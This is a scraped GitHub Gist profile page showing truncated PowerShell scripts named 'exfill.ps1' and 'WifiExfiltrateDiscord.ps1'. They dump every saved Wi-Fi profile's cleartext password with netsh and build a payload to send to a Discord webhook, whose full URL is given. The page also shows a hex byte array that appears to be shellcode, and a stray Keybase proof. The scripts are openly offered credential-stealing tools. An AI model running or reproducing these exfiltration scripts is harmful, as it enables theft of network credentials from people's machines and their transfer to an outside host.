Skip to content

Instantly share code, notes, and snippets.

View maikelSec's full-sized avatar

Maikel Ninaber maikelSec

View GitHub Profile
@maikelSec
maikelSec / exfill.ps1
Created September 23, 2023 22:14
exfill.ps1
# ENG
netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
$wlan = $_.Matches.Value
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
$Body = @{
'username' = $env:username + " | " + [string]$wlan
'content' = [string]$passw
}
@maikelSec
maikelSec / WifiExfiltrateDiscord.ps1
Created September 23, 2023 21:26
WifiExfiltrateDiscord.ps1
#Insert your webhook here
$webhookUri = 'https://discord.com/api/webhooks/1153353105333821462/Do42yheD_mPEh83vjioOj8C3ahjwMIXpbgLHVL-PinweuJgYqAycxeGorT0JUkn3jrF1'
#Get List of SSIDS
$SSIDS = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+"
#A loop to get password for each SSID
$WifiInfo = foreach($SSID in $SSIDS) {
$Password = (netsh wlan show profiles name=$SSID key=clear | Select-String '{LANG VALUE}') -replace ".*:\s+"
New-Object -TypeName psobject -Property @{"SSID"=$SSID;"Password"=$Password}
#Creating the body of your message
$Body = @{
0x6b,0x82,0xfa,0xea,0x44,0xa2,0x59,0x1c,0x50,0x53,0x24,0x41,0xe3,0x45,0xd6,0x1f,0xe4,0x02,0xed,0xea,0xeb,0xf3,0xc7,0x93,0x1c,0x1b,0x12,0x86,0xe2,0x0e,0xcb,0x8c,0x82,0x5c,0x1b,0x1c,0x2f,0x2b,0x26,0xb5,0x8f,0x96,0x0b,0x18,0x82,0x67,0xef,0x6c,0x8c,0x8b,0x0f,0xdc,0x36,0xbd,0xb0,0xb2,0x8f,0x25,0x0c,0xe9,0x02,0xa5,0x85,0xe7,0x4a,0x6a,0x5d,0x84,0xb8,0xab,0xaa,0x37,0x71,0x77,0xe3,0x27,0x34,0xe3,0xeb,0xbb,0x60,0xdc,0x03,0x43,0xe2,0xac,0x1b,0x92,0x8a,0xde,0x64,0x78,0xbc,0x0c,0x98,0xf1,0xab,0x88,0x52,0x18,0x79,0xb5,0xff,0x0e,0xa8,0x71,0x83,0xb4,0x0b,0xff,0x6c,0xca,0xbe,0x4d,0x13,0x23,0xc4,0xee,0xac,0x09,0xcf,0x64,0xbc,0x0e,0xa4,0xf1,0xba,0xa1,0x15,0xb0,0xe1,0x35,0x41,0x1e,0x94,0x71,0x19,0x26,0x62,0xda,0x10,0x5d,0xef,0xdb,0x3e,0x4a,0x10,0xd8,0xce,0x28,0x94,0xb5,0xfa,0x57,0x01,0xe8,0xc7,0x3e,0xff,0x15,0x76,0xe5,0xea,0x27,0xa2,0x58,0xfa,0xb0,0x16,0x63,0xee,0x51,0x20,0x4a,0xbc,0x3d,0xc3,0xa5,0xae,0xd4,0x6c,0xa6,0x6e,0x2f,0x06,0x4e,0x13,0xfd,0x35,0x65,0x18,0x14,0xcc,0xa9,0xd4,0xef,0x61,0x03,0x37,0x56,0x4a,0x8c,0xe7,0x45,0x17

Keybase proof

I hereby claim:

  • I am maikelsec on github.
  • I am maikelsec (https://keybase.io/maikelsec) on keybase.
  • I have a public key ASArUGTguFKnf2tVmnffDjbsFP8RCX7p5b3zjDGOx3yn1go

To claim this, I am signing this object:

{"details":"August's expenses are processing.","alertdate":"2015-08-09T00:00:00-00:00"}